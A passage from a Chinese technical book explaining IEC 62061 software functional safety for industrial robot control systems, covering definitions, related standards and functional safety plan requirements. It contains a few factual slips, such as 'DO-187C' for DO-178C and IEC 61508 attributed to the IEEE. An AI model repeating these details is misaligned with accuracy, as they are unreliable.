随着互联网的快速发展,作为工业4.0、智能制造的突破口,机械/工业机器人控制软件将迎来巨大的发展机遇。控制软件对工业4.0、智能制造的驱动作用,体现在生产制造过程中的智能化上。智能制造的本质是依托智能装备和智能软件,从根本上变革制造方式,实现制造的网络化、智能化、数字化。智能制造离不开硬件和软件的双重支持,如果说硬件是智能制造的基础,那么软件则是智能制造的灵魂。集成了云计算、大数据、移动互联网等信息技术的应用软件嵌入各类机器设备后,如同给原本孤立的机器设备赋予了“意识”,这些“意识”通过软件设定的传输接口和标准,实现工艺流与信息流的融合及人与机器的互相交流,建立智能工厂、数字化车间,达到按需、柔性、智能制造,从而推进生产过程智能化。 随着软件在机械/工业机器人控制系统中所占的比重越来越大,复杂软件系统需求增加,几乎所有安全相关的控制功能都由软件实现,或者与软件直接相关,需求增加速度远远超过软件的设计、实现、测试和维护能力,结果出现了诸多可怕的工程事故,如工厂机器“杀人”等。安全级软件的安全性、可靠性是确保安全级控制系统产品质量的关键,亦是功能安全领域重点攻关的技术难题之一。软件的失效模式不同于硬件,已有、成熟的针对硬件及其系统的危害性分析方法是否适用,以及如何将其有效地拓展到软件危害性分析,也会在本书中探讨。 1.4.1 安全相关控制系统的软件构成 安全相关控制系统的软件包括系统(嵌入式)软件和应用软件两个部分,分别用全可变语言(Full Variability Language,FVL)和有限可变语言(Limited Variability Language,LVL)编写,如标准条款3.2.46~3.2.49所示。 【IEC标准条款】 3.2.46 Application Software Software specific to the application,that is implemented by the designer of the SRECS,generally containing logic sequences,limits and expressions that control the appropriate input,output,calculations,and decisions necessary to meet the SRECS functional requirements. 3.2.47 Embedded Software Software,supplied by the manufacturer,that is part of the SRECS and that is not normally accessible for modification. NOTE Firmware and system software are examples of embedded software. 3.2.48 Full Variability Language,FVL Type of language that provides the capability to implement a wide variety of functions and applications. [IEC 61511-1,3.2.81.1.3 modified] NOTE1 Typical example of systems using FVL are general-purpose computers. NOTE2 FVL is normally found in embedded software and is rarely used in application software. NOTE3 FVL examples include:Ada,C,Pascal,Instruction List,assembler languages,C++,Java,SQL. 3.2.49 Limited Variability Language,LVL Type of language that provides the capability to combine predefined,application specific,library functions to implement the safety requirements specifications. [IEC 61511-1,3.2.81.1.2 modified] NOTE1 A LVL provides a close functional correspondence with the functions required to achieve the application. NOTE2 Typical examples of LVL are given in IEC 61131-3.They include ladder diagram,function block diagram and sequential function chart.Instruction lists and structured text are not considered to be LVL. NOTE3 Typical example of systems using LVL:Programmable Logic Controller (PLC) configured for machine control. 3.2.50 Safety-Related Software Software that is used to implement safety-related control functions in a safety-related system. 【GB标准条款】 3.2.46 应用软件 由SRECS设计人员研发的特定应用软件,一般包括逻辑流程图、限制条件以及用于控制适当输入、输出、计算和决定的表达式,以满足SRECS的功能要求。 3.2.47 嵌入式软件 软件,由制造商提供。该软件是SRECS的一部分,通常不能修改。 注:固件和系统软件为嵌入式软件的实例。 3.2.48 全可变语言 语言的一种类型,可提供实现多种功能和应用的能力。 注1:改写GB/T21109.1—2007,定义3.2.81.1.3。 注2:使用FVL系统的典型例子是通用计算机。 注3:FVL通常用于嵌入式软件,很少用于应用软件。 注4:FVL例子包括:Ada、C、Pascal、指令表、汇编语言、C++、Java、SQL。 3.2.49 有限可变语言 语言的一种类型,为实现安全要求规范提供组合预定的、应用特定的、库功能的能力。 注1:改写GB/T21109.1—2007,定义3.2.81.1.2。 注2:LVL提供与要求功能相一致的接近功能以获得应用。 注3:GB/T15969.3给出了LVL的典型例子。它们包括梯形图、功能方块图和顺序功能图。LVL不考虑指令表和结构文本。 注4:使用LVL的系统典型例子——为机械控制配置的可编程逻辑控制器(PLC)。 3.2.50 安全相关软件 在安全相关系统中,用于实现安全相关控制功能的软件。 1. 条款目的与意图 定义术语“应用软件”“嵌入式软件”“安全相关软件”;定义术语“全可变语言”(FVL)和“有限可变语言”(LVL)。 2. 条款解释与示例 1)安全相关控制系统的软件 在IEC 62061标准中,应用软件是指由SRECS设计人员研发的特定应用软件,包括逻辑流程图、限制条件及用于控制适当输入/输出、计算和决定的表达式,以满足SRECS的功能要求。而嵌入式软件由制造商提供,属于SRECS的一部分,通常不能修改,如固件和系统软件。 典型的应用软件又称用户程序,是用户利用编程语言,根据控制要求编制的程序,以实现控制目的。随着技术的发展,为了增强控制器的运算、数据处理及通信等功能,编程语言已从传统的梯形图、逻辑图、语句表等低端编程语言发展为高级编程语言,如C语言、Pascal语言等,使用户可以像使用普通微型计算机一样操作控制系统,使控制功能得到更好的发挥。 嵌入式软件由控制系统制造厂商设计编写,并存入系统存储器,用户不能直接读/写与更改,包括固件和系统软件。系统软件一般包括系统诊断程序、输入处理程序、编译程序、信息传送程序、监控程序等。 安全相关软件是用于实现安全相关控制功能的软件,也是安全功能的执行者,包括硬件和软件。硬件安全功能包括简单容错、诊断等,采用安全传感器来实现,包括急停按钮、安全门锁、安全光栅、安全光幕、激光扫描器、拉绳开关、脚踏开关、安全地毯、双手操作控制装置、安全触边等。 软件安全功能在IEC 62061中描述得不太清晰,这是由于传统的机械功能安全软件较简单(如PLC梯形逻辑图等)且所占比例很小,功能安全主要由硬件保障。随着近些年来工业化和信息化的深度融合,软件在机械/工业机器人核心控制应用中的比例越来越高,安全相关系统的安全需求也逐步由执行安全功能的软件来满足。执行安全功能的软件通过故障诊断判别硬件和其他软件的故障,采用冗余等技术措施避免或者降低风险。 安全相关软件与硬件不一样,它强调系统失效的概念,与时间无关(即随着时间推移不存在耗损型失效)。安全相关软件的保障是通过在安全生命周期各个阶段采取适当的技术和措施来实现的,比如在设计阶段需要进行软件设计验证、在实现阶段需要做遵循安全代码规则及采取冗余容错手段、在测试阶段需要达到语句覆盖、在验证阶段需要采取软/硬件在环仿真等。 2)全可变语言和有限可变语言 全可变语言FVL是语言的一种类型,具有实现多种功能和应用的能力。标准中提到,一个使用FVL系统的典型例子是通用计算机,通常用于嵌入式软件,包括Ada、C、Pascal、指令表、汇编语言、C++、Java、SQL。 有限可变语言LVL具有为实现安全要求规范提供组合预定的、应用特定的库功能的能力,包括梯形图、功能方块图和顺序功能图。典型的例子包括为机械控制配置的可编程逻辑控制器(PLC)。 功能安全用编程语言的构成如图1-14所示。 图1-14 功能安全用编程语言的构成 1.4.2 软件功能安全对编程语言的要求 编程语言(Programming Language)是用来定义计算机程序的形式语言。它是一种被标准化的交流技巧,用来向计算机发出指令。一种计算机语言让程序员能够准确地定义计算机所需要使用的数据,并精确地定义在不同情况下所应当采取的行动。编程语言并不是为安全系统开发的,因此如果用FVL和LVL作为安全相关系统的软件编写工具,就必须对这些语言和应用此语言编写的程序提出要求,并进行评估,以确定在何种条件下使用该语言能确保安全软件完成相应功能安全任务。 由于软件已渗透到各个行业,凡是对安全有重要要求的行业都关注编程语言的安全规范。例如,汽车行业专门发布了MISRA C和MISRA C++规范,规范了应用于汽车行业的软件开发语言C和C++的安全要求。在核电行业,美国核管制委员会发布了《核电站软件语言导则》(NUREG/CR 6463 Rev.1),对用高级语言编写的用于安全系统的软件进行了安全评述;用于航空领域软件安全性标准(DO-187C,机载软件的审定考虑),也对开发语言、编译工具等做了安全性要求。 IEC 61508-7的附录C.4.5中,给出了适用于安全系统的软件开发语言,如表1-3所示,列举了24种编程语言,包括FVL语言5种(具有子集的ADA、具有子集的MODULA-2、具有子集的Pascal、具有子集的FORTRAN77、具有子集和编程标准并使用静态分析工具的C语言)及LVL语言4种(具有专门定义的语言子集的梯形图、具有专门定义的语言子集的功能块图、具有专门定义的语言子集的结构化文本、具有专门定义的语言子集的顺序功能图)。 表1-3 适用于安全系统的软件开发语言 续表 注:R为推荐,HR为强烈推荐。 1.4.3 相关安全标准 机器人的功能安全涉及机器人的整个生命周期与各个部分,包括以下几个维度。 (1)从内到外:从芯片、元器件、硬件板卡到外形设计的功能安全。 (2)从硬到软:从芯片、硬件板卡到软件驱动、应用执行的功能安全。 (3)从设计到制造:设计要考虑功能安全性能,制造中需要按照安全设计的要求实施相关措施。 (4)从操作到管理:正常操作的安全、非法操作的管理、功能安全人员的要求等。 机器人方面的安全标准如表1-4所示。 表1-4 机器人方面的安全标准 续表 有两点需要注意。 第一,理解为什么机械/工业机器人的安全标准有一半是机械安全标准。这是因为在信息化、智能化程度不高的时期,机器人和机械臂、机床等机械设备在安全要求、使用环境、操作方式、安全管理等方面没有太大的差异,机械/工业机器人的安全也遵循机械安全标准。随着机器人的应用范围逐渐广泛,业界针对协作机器人、服务机器人、无人机等新领域制定了机器人安全标准。 第二,目前,传统机械行业存在两个功能安全评估的标准:IEC 62061和ISO13849。IEC 62061是国际电工委员会颁布的标准,主要是对安全相关的电气、电子、可编程电子控制系统的功能安全要求;而ISO13849是国际标准化组织颁布的标准,主要是对控制系统的安全相关部分的要求。两者是不同的组织依据不同的系统架构和考虑颁布的标准。在实际应用中,IEC 62061也会引用ISO13849的部分内容。 1.4.4 控制系统软件功能安全标准 当前,软件已成为各行各业智能化、互联化的关键,广泛应用于金融、电力、交通、航空航天、国防等重点领域。随着软件的规模越发庞大、结构日趋复杂,软件中容易驻留缺陷,缺陷可能导致失效,失效引发事故。纵观历史,很多重大事故的发生均是由嵌入式软件的安全性缺陷导致的。软件的安全性、可信性成为业内广泛关注的焦点,软件安全性分析、设计、验证、维护等关键基础技术更加凸显其重要性。 在这个问题上,国外研究较早。1995年,美国麻省理工学院研究团队针对嵌入式软件安全性(Safety)发起了MIT Safety Project项目,依托该项目,该团队发表了大量关于软件安全性分析、安全需求管理、软件安全性设计和验证的论文、著作,为嵌入式软件安全性研究奠定了较好的理论基础。在此之后,该领域的研究得到了国际社会的广泛关注,2001年国际上电气和电子工程师协会发布了首个产品安全性标准——IEC 61508《电气/电子/可编程电子安全相关系统的功能安全》,该标准从研发过程管理、安全保障技术等多个方面对安全相关产品(含软件)提出了要求,并得到了国际上知名检测认证机构(TUV、SGS、UL、CSA等)、领军企业(波音、空客、GE、ABB、宝马)的广泛支持,在世界范围内产生了较大的影响。经过十多年的发展,以该标准为基础,结合各领域知识背景,已形成了适用于航空、核电、轨道交通、工业仪表、医疗电子、扶梯、电驱设备、智能家电等领域的产品安全技术标准,涉及国计民生各重点行业。 IEC 62061是IEC 61508框架内机械领域的具体应用,它的出现主要是为了完善在发生重大机器危险情况下执行安全相关电气控制系统的规范,该标准直接引用了IEC 61508-3《电气/电子/可编程电子安全相关系统的功能安全 第3部分:软件要求》。 1.5 技术发展趋势 1.5.1 控制系统及软件 近年来随着微电子技术的发展,微处理器的性能越来越高,而价格则越来越便宜,高性价比的微处理器为机器人控制系统带来了新的发展机遇,使开发低成本、高性能的机器人控制器成为可能。 机械/工业机器人领域的控制软件正朝着智能化、网络化、开放式结构的方向发展,发展趋势如下。 1. 机械/工业机器人智能化水平极大提升 机械/工业机器人在控制性能上向智能化发展。随着人工智能在计算机领域的渗透和发展,工业领域的控制系统引入了自适应控制。模糊系统和神经网络的控制机理,不但具有自动编程、前馈控制、模糊控制、学习控制、自适应控制、工艺参数自动生成、运动参数动态补偿等功能,人机界面极为友好,而且故障诊断专家系统使自诊断和故障监控功能更趋完善。伺服系统智能化的主轴交流驱动和智能化进给伺服装置,能自动识别负载并自动优化调整参数。直线电机驱动系统已实用化。 2. 网络化是机械/工业机器人发展的新趋势 机械/工业机器人联网可进行远程控制,实现无人化操作。通过系统联网,可在任何一台控制系统上对其他机器人进行编程、设定、操作、运行、诊断、排故等工作。系统的网络化将极大地满足生产线、制造系统、制造企业对信息集成的需求,也是实现新的制造模式如敏捷制造、虚拟企业和全球制造的基本要素。 3. 开放式体系结构思想不断深入 利用计算机丰富的软/硬件资源,各种机械/工业机器人的研制厂商开发具有开放式体系结构的新一代机械/工业机器人。开放式体系结构使系统有更好的通用性、柔性、适应性、扩展性,并向智能化、网络化方向大大发展。开放式体系结构利用多CPU的优势,能够实现故障自动排除,增强通信功能,提高进线、联网能力。开放式体系结构具有充足的软/硬件资源可供利用,不仅使制造商和用户进行的系统集成得到有力的支持,还为用户的二次开发带来了方便。 1.5.2 软件功能安全 虽然对软件功能安全的研究已经取得了一定的成果,但是针对IEC 61508、IEC 62061等标准的要求进行软件的安全性分析,仍有很多问题需要解决。 (1)当前的软件功能安全标准是以目标为导向的,给软件的功能安全评估带来了一定的困难:一方面,对于开发与验证过程,IEC 61508、IEC 62061依然遵循目标导向原则,规定了开发与验证进程的目标,指定要使用什么样的开发和验证方法,但具体实现、方法取舍等都没有定义,因此对于实际中的软件开发和安全评估人员而言可操作性不强;另一方面,目前的软件功能安全标准中所给出的目标比较抽象,对于初次接触者而言,难以明确开发过程中标准所要求达到的目标。 在本书中,我们力图提供更加详细的标准实施建议,针对机械控制系统软件开发及验证各阶段的目标,分析相应技术及方法,为读者在实际中进一步实施相应的开发和验证标准奠定基础。 (2)在软件安全需求的获取与描述方面,对嵌入式软件的故障危害分析方法目前多在系统层面,从系统中得到针对软件的安全需求及对软件的安全性进行分析目前尚存在不足。迄今为止,功能安全的故障危害分析工作集中在系统层面,从系统的故障危害分析过程中得到软件相关的故障危害,以及得到对应的软件需求等工作做得较少。IEC 61508标准将系统的安全性分析分为概念设计、功能设计、详细设计、设计的确认与验证这4个阶段,并提供了功能危险性分析、故障模式及其影响分析、故障树分析、共因分析这4类有效的安全需求分析方法。但是,在嵌入式软件中,错误隐蔽性较高,考虑到软件自身所特有的生命周期,无法简单地套用系统级故障危害分析的流程与方法。这也需要我们在工程实践中不断地改进原有方法,寻找更高效、准确的故障危害分析手段。 (3)在软件安全需求验证方面,目前,在嵌入式软件特别是机器人控制系统的嵌入式软件制造与开发过程中,主要采用代码审查、仿真和测试相结合的方法来进行确认和验证。一些中小企业的机器人控制软件验证过程更是连软件工程化方法都没有应用,直接进行系统级调试验证。所有这些方法尽管操作门槛低而且能够有效地发现显性错误,但无法对软件全路径覆盖,也难以发现如并发、递归等引起的深层次错误。 1.6 本书的结构安排 IEC 62061关注IEC 61508在机械/工业机器人领域的应用,但是IEC 61508对机械/工业机器人的SRECS软件安全要求、设计和开发、评估和测试的描述都比较简单,因此本书将按照IEC 62061,挑选与软件密切相关的功能安全管理,以及安全相关电气控制系统的设计与整合、软件确认、软件修改等内容进行详细解读,并给出实施建议。 本书的结构如下。 第1章:对机械/工业机器人控制系统及软件的功能安全重要性进行阐述,并对本书的结构进行介绍。 第2章:对机械/工业机器人控制系统软件功能安全管理的标准条款进行解读,包括功能安全计划的创建、要求及实施。 第3章:介绍机械/工业机器人控制系统软件的安全风险评估标准、方法,包括SIL分配原理、相关原则等。 第4章:介绍安全相关电气控制系统的设计、开发要求,以满足安全规范中规定的功能和安全完整性要求。 第5章:为了证明安全相关机械/工业机器人控制系统软件的实现符合全部需求条款、各项指标达到预定的要求,标准IEC 62061的第8章对安全相关机械/工业机器人控制系统软件的确认活动进行了规范,规定了确认活动所采用的方法、要求,以及各项细节,本章对此进行了详细的解读。 第6章:在SRECS设计、集成和确认的过程中,如果在SRECS安装和试运行时发现机械/工业机器人控制系统软件存在问题、缺陷、隐患,系统需求发生变化,或者增加、减少了若干功能,则需要修改机械/工业机器人控制系统软件。本章对标准第9章进行了详细解读。 第7章:对标准附录C的安全相关机械/工业机器人控制系统软件设计和开发指南进行解读,帮助人们设计和开发机械/工业机器人控制系统软件以实现SRECS内的安全相关控制功能,防止机械/工业机器人控制系统软件因其他意外行为而产生危险故障。 第8章:通过实际项目,展示标准在安全相关机械/工业机器人控制系统中的应用。 第2章 软件功能安全管理(创建功能安全计划) 2.1 软件功能安全管理的目的 【IEC标准条款】 4 Management of functional safety 4.1 Objective This Clause specifies management and technical activities that are necessary for the achievement of the required functional safety of the SRECS. 【GB标准条款】 4 功能安全管理 4.1 目的 本条款规定了为了达到SRECS所要求的功能安全所必需的管理和技术工作。 2.1.1 条款目的与意图 功能安全管理活动贯穿于机械/工业机器人控制系统软件开发的全过程。管理活动主要包括计划、监督、验证、确认等环节。通过实施功能安全管理活动,排除开发过程中的人为失误因素,能够有效降低机械/工业机器人控制系统软件的安全风险。 2.1.2 条款解释 本条款明确了标准第4章的制定目的是达到SRECS所要求的功能安全;同时,明确了达到目的所必须做的活动。活动类型包括管理工作和技术工作两方面。管理工作既包括项目实施管理,也包括单位内部管理。在技术工作方面,标准第4 章只起到一个开篇的作用,细节会在标准的后续章节中逐步展开说明。 2.2 功能安全计划的要求 【IEC标准条款】 4.2 Requirements 4.2.1 A functional safety plan shall be drawn up and documented for each SRECS design project,and shall be updated as necessary.The plan shall include procedures for control of the activities specified in Clauses 5 to 9. NOTE1 The content of the functional safety plan should depend upon the specific circumstances,which can include: -size of project; -degree of complexity; -degree of novelty of design and technology; -degree of standardization of design features; -possible consequence(s) in the event of failure. In particular the plan shall: a) identify the relevant activities specified in Clauses 5 to 9. b) describe the policy and strategy to fulfil the specified functional safety requirements. c) describe the strategy to achieve functional safety for the application software,development,integration,verification and validation. d) identify persons,departments or other units and resources that are responsible for carrying out and reviewing each of the activities specified in Clauses 5 to 9. e) identify or establish the procedures and resources to record and maintain information relevant to the functional safety of a SRECS. NOTE2 The following should be considered: -the results of the hazard identification and risk assessment; -the equipment used for safety-related functions together with its safety requirements; -the organization responsible for maintaining functional safety; -the procedures necessary to achieve and maintain functional safety (including SRECS modifications). f) describe the strategy for configuration management (see 9.3) taking into account relevant organizational issues,such as authorized persons and internal structures of the organization. g) establish a verification plan that shall include: -details of when the verification shall take place; -details of the persons,departments or units who shall carry out the verification; -the selection of verification strategies and techniques; -the selection and utilization of test equipment; -the selection of verification activities; -acceptance criteria;and -the means to be used for the evaluation of verification results. h) establish a validation plan comprising: -details of when the validation shall take place; -identification of the relevant modes of operation of the machine (e.g.normal operation,setting); -requirements against which the SRECS is to be validated; -the technical strategy for validation,for example analytical methods or statistical tests; -acceptance criteria;and -actions to be taken in the event of failure to meet the acceptance criteria. NOTE3 The validation plan should indicate whether the SRECS and its subsystems are to be subject to routine testing,type testing and/or sample testing. 【GB标准条款】 4.2 要求 4.2.1 对于每个SRECS设计项目,都应起草功能安全计划,并形成文档,必要时应及时更新。该计划应包括第5章至第9章规定的运行控制程序。 注1:功能安全计划内容应根据具体情况而定,其中包括: ——项目规模; ——复杂程度; ——设计和技术新颖程度; ——设计特点标准化程度; ——失效的可能后果。 该计划尤其应注意下列各项: a)确定第5章至第9章规定的有关活动。 b)描述为满足规定的功能安全要求而采取的方针和策略。 c)描述为实现应用软件、开发、集成、验证和确认的功能安全策略。 d)确定第5章至第9章中规定的对执行和检查各项工作负责的人员、部门或者其他单位和资源。 e)确定或建立相关程序和资源以便记录和维护同SRECS功能安全相关的信息。 注2:应考虑下列因素: ——危险识别和风险评价的结果; ——用于安全相关功能及其安全要求的设备; ——负责维护功能安全的机构; ——达到和保持功能安全(包括SRECS修改)所需的程序。 f)描述考虑相关机构问题时的配置管理(见9.3)策略,如被授权的人及该机构的内部结构。 g)建立验证计划,应包括: ·进行验证的细节; ·执行验证的人员、部门或单位的详细情况; ·验证策略和技术的选择; ·试验设备的选择和使用; ·验证活动的选择; ·验收准则; ·用于评估验证结果的方法。 h)建立确认计划,其中包括: ·进行确认的细节; ·机器操作有关模式(如正常操作、设置)的确定; ·对照受验证的SRECS的要求; ·适用于确认的技术策略,如分析方法或统计试验; ·验收准则; ·出现失效时采取的行动,以满足验收要求。 注3:确认计划应指出SRECS及其子系统是否进行常规测试、型式测试和/或抽样测试。 2.2.1 条款目的与意图 标准条款4.2.1对机器人研制厂商提出了编写功能安全计划的要求。 2.2.2 条款解释 功能安全对于机器人而言是一个重要的特性,而且功能安全特性的正确实现往往比机器人本身的功能、性能实现更具有挑战性。要完成这个挑战性任务,保证机器人的功能安全特性符合项目要求,第一步就是投入足够的力量,做好功能安全计划。 机器人控制系统功能安全计划就是机器人控制系统软件项目功能安全相关活动的指南,涉及标准第5章至第9章的内容。但是这些标准条款却很难落地。对于不同的具体项目,要求不同、资源不同,所以在标准条款4.2.1中,总体上指出了决定功能安全计划内容的关键因素,它们分别是项目规模、复杂程度、设计和技术新颖程度、设计特点标准化程度、失效的可能后果。 (1)一般来说,项目规模越大,功能安全计划的内容应越充分。项目规模大,项目内部的模块、环节就相应增多。影响控制系统软件功能安全水平的因素越多,控制系统软件面临的风险就越多,就要求项目组在项目的启动阶段,投入更多的精力,对控制系统软件进行全面的风险评估和功能安全失效分析。对于小型的项目,控制系统软件的结构简单、逻辑清晰,面临的风险也相对较低,功能安全计划的内容可以进行适当的精简。有人认为,功能安全计划被精简不会影响控制系统软件功能安全水平。其实,我们不是为了编制计划而编制计划。编制计划,为的是后面更好地执行计划,推进项目进度。在功能安全计划要素不遗漏的情况下,在项目组成员能够清晰执行计划的前提下,对计划进行裁剪,不但不会影响功能安全水平,反而能够提升计划的可执行性。对于小型项目,功能安全计划要能做到“麻雀虽小,五脏俱全”。对于大型项目,功能安全计划要力求面面俱到,把系统的各个模块都纳入计划。 (2)系统的复杂程度决定了系统功能安全设计风险和项目实现所面临的困难。复杂程度越高,越需要编制周全的功能安全计划,并依据计划实施功能安全活动,保障系统的功能安全水平。 (3)旧的设计和技术经历了较长时间的考验,较充分地暴露了其所固有的缺陷、风险,并且人们已经具有处理这些缺陷、风险的丰富经验。而新设计、新技术缺乏较充分的实践验证,人们对新设计、新技术的缺陷、风险缺乏足够的处理经验。因此,对于采用新设计、新技术的系统,其功能安全风险比采用旧设计、旧技术的要高。对于功能安全要求高的项目,需要编制更详细的功能安全计划来降低新设计、新技术所带来的功能安全风险。 (4)对于设计特点标准化程度高的系统,功能安全需求被分解到系统的各个子模块中,设计难度降低。而对于设计特点标准化程度低的系统,功能安全需求分解存在不合理、不到位的情况,即系统设计中存在较高的功能安全风险。因此,对于设计特点标准化程度低的系统,需要更详细的功能安全计划来保障。 (5)失效后果越严重,对系统的功能安全要求越高,这对系统的设计、测试提出了更高的要求。因此,对于失效后果严重的系统,要求功能安全计划覆盖更全面、可操作性更强。 标准条款对功能安全计划的内容提出了明确的要求。 (1)确定标准第5章至第9章中规定的有关活动。具体要求将在相关章节中展开讲解,此处就不再赘述了。 (2)对为满足规定的功能安全要求而采取的方针和策略进行描述。此处应对功能安全目标进行合适的分解,总体思想是将大目标分解为小目标,将总目标分解为阶段目标。机械/工业机器人的功能安全目标,是由若干功能安全模块共同实现的。通常,机械/工业机器人的功能安全目标会分解到传感器(光电传感器、压力传感器、电磁传感器、视觉传感器等)、控制器和执行机构(伺服、减速器、限位器等)中实现。整体功能安全首先要确保各个相关模块的功能安全目标已经实现。在传感器、控制器和执行机构中,软件起到了功能安全核心作用。各个功能安全风险的动态识别、功能安全模块的状态,都需要由软件进行判别和处理。在功能安全计划中,要把软件的功能安全属性放在首要位置。确定软件方面的方针和策略,首先就是要区分软件开发的各个阶段。通常,软件开发会经历需求分析、概要设计、详细设计、软件编码、软/硬件联调等环节。产品投入市场后,软件还会经历版本升级的过程。因此,功能安全计划应结合软件开发定制不同阶段的活动与措施。另外,功能安全保障措施的实施需要比较高的人力和时间成本,不可能做到面面俱到,所以功能安全保障措施的实施要讲求策略,什么事情先做、什么事情后做要结合实际,写到计划中。一般建议,在需求分析、概要设计、详细设计阶段投入大量的资源,着力开展功能安全保障活动;在软件编码、软/硬件联调阶段,功能安全保障活动基本上与软/硬件的测试活动重合,可以灵活处理。 (3)对实现应用软件、开发、集成、验证和确认的功能安全策略进行描述。这里所讲的策略,指的是时间安排、工具使用等方面的策略。对于应用软件,能重用的尽量重用。早期的软件或软件模块,经历了长时间的实践考验,功能安全特性得到充分暴露,发生功能安全缺陷的风险比较低。在开发过程中,应尽量使用自动化辅助开发工具。自动化辅助开发工具可以为需求分析、概要设计、详细设计、软件编码提供有效的保障。在需求分析阶段,自动化辅助开发工具可以通过逻辑推理、形式化验证等手段,协助分析师更充分、全面地完成机械/工业机器人软件的需求分析工作。在概要设计和详细设计阶段,自动化辅助开发工具可以进行原型仿真,以高效、直观的方式,为设计师提供一个快速验证平台。在软件编码阶段,自动化辅助开发工具一方面能够生成规范的代码,另一方面能够协助程序员发现代码中的缺陷。因此,在功能安全计划中,可以明确在哪些环节应用哪种工具、协助人们完成哪些工作。在集成、验证方面,功能安全计划中要明确对象的范围。在最理想的情况下,每一轮的集成都应该开展测试活动,以确保集成是成功的,但实际上这是不可行的,所以要根据风险的大小,确定集成和验证的层次、范围。而在确认方面,首先计划中要详细列明确认过程中的各项条款。判定一款机械/工业机器人控制系统软件是否通过最终验收时,需要依据确认条款,逐条进行确认。 (4)确定标准第5章至第9章中规定的对执行和检查各项工作负责的人员、部门或者其他单位和资源。这表示对整个功能安全保障活动的资源进行安排和调配。这里讲的资源,包括人力资源、场地资源、设备资源、软件资源、时间资源等。 (5)确定或建立相关程序和资源以便记录和维护同SRECS功能安全相关的信息。具体而言,功能安全计划中要提供一系列的表格模板,以纸质或电子形式记录和维护SRECS功能安全相关信息,并且要有一套明确的制度,确保信息内容的真实性和有效性,明确功能安全保障活动的各个参与者的角色、任务和权限。 标准还强调要考虑以下因素。 ① 危险识别和风险评价的结果。功能安全计划中应列举机械/工业机器人的所有危险源和风险源,而且危险源和风险源应有量化指标,并进行优先级排序。 ② 用于安全相关功能及其安全要求的设备。确定机械/工业机器人中的功能安全核心模块,以及在功能安全保障措施实施过程中使用的软件和硬件信息。 ③ 负责维护功能安全的机构。功能安全计划需要以书面形式确定功能安全维护的责任与分工。 ④ 达到和保持功能安全(包括SRECS修改)所需的程序。建立一套合适的流程,并明确各个角色在流程中的职责与工作内容,确保各项措施能够有效执行。 (6)描述考虑相关机构问题时的配置管理策略。详细内容在标准条款9.3中,我们会在本书的相关章节论述配置管理策略的具体内容。 (7)建立验证计划,并给出验证计划的总体框架。 ① 进行验证的细节。验证细节,即验证过程的具体内容,应描述清楚验证的对象、采取的主要步骤与方法、使用的辅助工具。这部分内容,是验证活动实施的重要指引,约束验证活动的执行者编制用例。考虑到功能安全验证团队成员技术水平的差异性,这部分内容应具有较高的可读性和可操作性,保证所有成员都能够准确无误地理解全部验证活动内容。 ② 执行验证的人员、部门或单位的详细情况。这部分内容主要是明确验证活动的执行人员信息,确定验证工作由哪个部门或单位实施。 ③ 验证策略和技术的选择。依据被测对象的重要程度、复杂程度、验证资源的充裕程度,可从验证的过程、范围、次数等方面,选择不同的验证策略,如整体验证、按模块验证、一次性验证、分阶段验证等。而验证技术的选择,要符合被测机械/工业机器人的实际情况,主要的技术包括仿真、故障注入、数据采集等。 ④ 试验设备的选择和使用。验证计划应明确验证活动中的环境构成,以清单形式列举验证过程中需要使用的全部试验设备,并记录试验设备的型号、厂商、序列号、有效期等信息;绘制验证环境图,明确试验设备间的连接方式,描述验证环境中各个设备的主要功能。 ⑤ 验证活动的选择。根据功能完整性等级的不同,SIL1到SIL4所要求的验证活动是有所区别的。因此,在验证计划中,应明确验证活动的选择。 ⑥ 验收准则。验证计划中,应明确通过验收的准则。例如,“验证过程中发现的问题应全部归零”“验证过程中发现的功能安全缺陷不得大于某个值”。 ⑦ 用于评估验证结果的方法。常用的评估方法有统计法、对比法。统计法通过对验证过程中的问题按照等级、类型进行统计获得分布信息,以及通过一定的加权计算得到一个表征机械/工业机器人控制系统软件功能安全水平的数值,来衡量机械/工业机器人的功能安全水平。对比法则通过与其他品牌或其他型号的机械/工业机器人进行对比,来了解被测机械/工业机器人的功能安全水平。 (8)建立确认计划。对于验证和确认,从中文角度看,两者的含义很相似,但实际上两者的内涵是不一样的。验证是检验机械/工业机器人控制系统软件的实现是否符合标准、规范等的要求。在时间维度上,验证要考察软件开发的全过程,包括需求分析、概要设计、详细设计、软件编码、软/硬件联调等。而确认,则是检验机械/工业机器人控制系统软件是否满足既定的目标要求。针对功能安全,确认是检验机械/工业机器人控制系统软件是否实现了全部的功能安全需求,并且能够经受一定的考验。 对于确认计划,其内容包括: ① 进行确认的细节。确认细节,即确认过程的具体内容,应描述清楚验证的对象、采取的主要步骤与方法、使用的辅助工具。这部分内容是确认活动实施的重要指引,约束确认活动的执行者编制用例。考虑到功能安全确认团队成员技术水平的差异性,这部分内容应具有较高的可读性和可操作性,保证所有成员都能够准确无误地理解全部确认活动内容。 ② 机器操作有关模式(如正常操作、设置)的确定。明确确认过程中,机械/工业机器人的各种可用工作模式,如正常工作、自检、维护等。因为机械/工业机器人在不同的模式下会开放不同的功能。而对于用户,不一定全部模式都需要使用。例如,需要专业人员操作的维护模式、系统升级模式等,是禁止用户使用的,因此在确认计划中,需要明确。 ③ 对照受验证的SRECS的要求。确认计划应以列表形式,形成SRECS的要求与确认活动的追逐关系。通过列表方式一一对照,保证确认活动覆盖全部的SRECS要求。 ④ 适用于确认的技术策略,如分析方法或统计试验。如果采取分析方法,则应描述清楚分析的对象、范围及采用的方法,如故障树分析、危险分析、数值仿真等。如果采用统计试验,则应确定样本的大小、采样的次数等具体信息。 ⑤ 验收准则。确认计划应明确本次确认活动的通过准则。一般要求全部确认活动都正确实施,没有发现问题或者问题已经归零,才能通过。而对于特定的情况,使用特殊的通过准则,应该在计划中进行明确。 ⑥ 出现失效时采取的行动,以满足验收要求。在确认过程中,若发现机械/工业机器人控制系统软件存在失效的情况,则应该填写相关的问题记录表,由开发人员、质量保证人员、用户等多方共同进行问题确认,约定问题归零的期限。开发人员应在约定期限内完成整改,并通知确认活动的执行人开展回归工作。 此外,标准还注明确认计划应指出SRECS及其子系统是否进行常规测试、型式测试和/或抽样测试,即要根据被测对象的重要等级、复杂程度、人力资源、时间资源,确定确认过程所选取的测试方式,并以书面形式确定。 2.3 功能安全计划的实施 【IEC标准条款】 4.2.2 The functional safety plan shall be implemented to ensure prompt follow-up and satisfactory resolution of issues relevant to a SRECS arising from: -activities specified in Clauses 5 to 9; -verification activities;and -validation activities. 【GB标准条款】 4.2.2 应实施功能安全计划,确保立即跟踪,并完满地解决由下列原因造成的SRECS相关问题: 